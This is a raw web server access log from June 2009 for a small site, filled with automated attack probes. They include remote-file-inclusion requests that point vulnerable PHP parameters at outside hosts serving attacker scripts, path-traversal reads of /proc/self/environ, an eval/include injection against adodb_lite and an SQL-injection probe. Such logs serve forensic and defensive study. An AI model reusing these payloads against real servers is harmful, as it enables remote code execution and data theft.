91.195.124.16 - - [28/Jun/2009:18:27:12 -0700] "GET /?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:12 -0700] "GET /logs//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 2087 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 779 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 2087 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:18:27:13 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2087 "-" "XXXXXX" "www.redneckmba.com"
76.13.114.105 - - [28/Jun/2009:18:39:26 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
72.14.199.8 - - [28/Jun/2009:19:06:32 -0700] "GET /blog/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=2093614446390835355)" "www.redneckmba.com"
65.55.210.90 - - [28/Jun/2009:19:18:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
65.55.210.90 - - [28/Jun/2009:19:18:03 -0700] "GET /logs/access_090615.log HTTP/1.1" 200 1048576 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
200.93.147.154 - - [28/Jun/2009:19:20:59 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
200.93.147.154 - - [28/Jun/2009:19:20:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
200.93.147.154 - - [28/Jun/2009:19:20:59 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
66.46.177.182 - - [28/Jun/2009:19:22:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
66.46.177.182 - - [28/Jun/2009:19:22:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
66.46.177.182 - - [28/Jun/2009:19:22:16 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
218.146.231.193 - - [28/Jun/2009:19:22:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.redneckmba.com"
218.146.231.193 - - [28/Jun/2009:19:22:35 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.redneckmba.com"
218.146.231.193 - - [28/Jun/2009:19:22:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.redneckmba.com"
201.232.54.48 - - [28/Jun/2009:19:23:12 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
201.232.54.48 - - [28/Jun/2009:19:23:12 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
201.232.54.48 - - [28/Jun/2009:19:23:12 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
201.232.54.48 - - [28/Jun/2009:19:24:30 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
201.232.54.48 - - [28/Jun/2009:19:24:30 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
201.232.54.48 - - [28/Jun/2009:19:24:30 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
222.162.115.67 - - [28/Jun/2009:19:31:29 -0700] "GET /logs/access_090112.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [28/Jun/2009:19:31:29 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [28/Jun/2009:19:31:29 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [28/Jun/2009:19:31:29 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [28/Jun/2009:19:31:29 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
222.162.115.67 - - [28/Jun/2009:19:31:29 -0700] "GET /logs/access_090112.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.225.180.4 - - [28/Jun/2009:19:31:54 -0700] "GET /pruduct.php?cid=' HTTP/1.1" 404 275 "-" "libwww-perl/5.824" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:36:41 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:36:41 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:36:41 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
221.195.40.213 - - [28/Jun/2009:19:37:46 -0700] "GET /logs/access.log//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "redneckmba.com"
221.195.40.213 - - [28/Jun/2009:19:37:47 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "redneckmba.com"
221.195.40.213 - - [28/Jun/2009:19:37:47 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:13 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:13 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:13 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:31 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:31 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:38:35 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:38:35 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:38:35 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:45 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:45 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:38:45 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "redneckmba.com"
221.195.40.213 - - [28/Jun/2009:19:41:44 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.redneckmba.com"
221.195.40.213 - - [28/Jun/2009:19:41:45 -0700] "GET /logs/access_090112.log//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.redneckmba.com"
221.195.40.213 - - [28/Jun/2009:19:41:45 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:43:28 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:43:28 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:43:29 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
221.195.40.213 - - [28/Jun/2009:19:47:51 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:49:00 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:49:00 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:49:00 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:49:01 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:49:01 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:49:01 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:54:57 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:54:57 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:19:54:57 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
60.43.229.5 - - [28/Jun/2009:19:57:48 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [28/Jun/2009:19:57:48 -0700] "GET /logs/access_090112.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [28/Jun/2009:19:57:49 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:19:58:59 -0700] "GET /logs//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:19:58:59 -0700] "GET /logs/access.log//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:19:58:59 -0700] "GET /include/functions.inc.php?REX[INCLUDE_PATH]=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:19:59:03 -0700] "GET /logs/access.log//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:19:59:03 -0700] "GET /include/functions.inc.php?REX[INCLUDE_PATH]=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:19:59:03 -0700] "GET /logs//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
38.103.48.109 - - [28/Jun/2009:19:59:09 -0700] "GET /logs//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
38.103.48.109 - - [28/Jun/2009:19:59:09 -0700] "GET /include/functions.inc.php?REX[INCLUDE_PATH]=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
38.103.48.109 - - [28/Jun/2009:19:59:10 -0700] "GET /logs/access.log//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
38.117.93.134 - - [28/Jun/2009:19:59:36 -0700] "GET /logs/access.log//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
38.117.93.134 - - [28/Jun/2009:19:59:36 -0700] "GET /include/functions.inc.php?REX[INCLUDE_PATH]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
38.117.93.134 - - [28/Jun/2009:19:59:36 -0700] "GET /logs//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:19:59:47 -0700] "GET /logs/access.log%20//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:59:53 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:59:53 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:59:53 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:19:59:56 -0700] "GET /logs/access.log%20//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:59:58 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:59:58 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
65.23.158.226 - - [28/Jun/2009:19:59:58 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.redneckmba.com"
38.103.48.109 - - [28/Jun/2009:20:00:05 -0700] "GET /logs/access.log%20//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
38.117.93.134 - - [28/Jun/2009:20:00:20 -0700] "GET /logs/access.log%20//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:20:00:31 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
